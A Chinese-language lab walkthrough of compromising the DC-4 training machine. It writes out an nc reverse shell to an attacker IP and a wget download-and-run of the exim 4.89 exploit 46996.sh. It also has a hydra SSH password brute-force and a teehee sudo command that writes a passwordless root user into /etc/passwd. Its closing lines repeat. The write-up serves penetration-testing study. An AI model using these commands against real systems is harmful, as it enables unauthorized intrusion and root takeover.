靶机-DC4

arp-scan找靶机IP

端口扫描

nmap扫描

dirb目录扫描

http://192.168.253.133/

whatweb扫描

burp爆破

用户名用默认admin

这里happy长度明显不同，尝试

进入后台

选择第一个

抓包发现这里是直接可以解析的

将命令改成自己想要输入的

反弹shell

nc 192.168.253.129 9999-e /bin/bash

只做到这里，后面shell反弹死都获取不到

---

可以看到kali中获得了shell

使用python获得交互式界面

python -c “import pty;pty.spawn(‘/bin/bash’)”

提权
不知道是这题的问题还是什么问题因为我以前做过DC-8，所以DC-4发现了2个提权点。

一个就是DC-8里面用到的exim4提权

另一个是

exim4提权
先看看当前权限

不是root权限

都先看看具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null
发现一个exim4

查看查看exim4版本

exim4 --version #查看exim4的版本

我的天哪！又是4.89 和DC-8的一样 又是和DC-8一样的套路

先看看本地漏洞库

searchsploit exim 4

46996符合exim 4.89 就用这个 拷贝到kali的apache web页面下

systemctl start apache2.service #开启apache
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html #拷贝到kali的apache web页面下

访问kali web页面 复制payload下载地址

http://192.168.79.128/46996.sh
DC-4下载payload

wget http://192.168.79.128/46996.sh

显示拒绝访问，看来是这个目录权限不够，我们移到/tmp里面

cd /tmp
wget http://192.168.79.128/46996.sh

下载成功，给执行权限，并且运行。

chmod +x 46996.sh
./46996.sh

成功获得root权限

---

teehee提权

一样通过nc进入靶机，查看系统里面有什么文件

慢慢查找发现有一个文件jim可以直接进去 然后里面有一些奇怪的文件 一个一个慢慢看

发现了一大堆密码类似的东西，应该是给我们的提示 让我们爆破jim

把文件保存下来，爆破我们使用hydra

hydra -l jim -P mmmm.txt 192.168.79.132 ssh

可以得到ssh账号密码为：jim jibril04

使用kali登录jim

ssh [email protected]

接下来还是一顿搜索 发现jim有邮件

进入邮件目录

cd var/spool/mail

可以看到发件人的账号和密码

账号：Charles

密码：^xHhA&hvim0y

直接su 切换用户试试

su Charles #发现不行 然后试了一下小写就没问题

账号：charles

密码：^xHhA&hvim0y

su charles # 然后输入密码即可

查看 使用sudo运行的命令

sudo -l

发现了个root权限的命令teehee（小型文本编辑器），可以利用这个命令进行提权

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  #建议手打命令，复制粘贴可能不管用

建议手打命令，复制粘贴可能不管用
可参考/etc/passwd文件解刨

简而言之，就是存放用户的文件，可以通过修改该文件达到添加用户的效果，文件格式为

口令为x即代表存放有密码，为空即代表没有密码，识标号为0代表root权限

利用管道符配合teehee命令，在passwd文件里写入一个不用密码root权限的用户test

FLAG

在root目录下

cd /root
cat flag.txt

用户标识号:组标识号:用户名:用户主目录:命令解析程序

口令为x即代表存放有密码，为空即代表没有密码，识标号为0代表root权限

利用管道符配合teehee命令，在passwd文件里写入一个不用密码root权限的用户test

FLAG
在root目录下

cd /root
cat flag.txt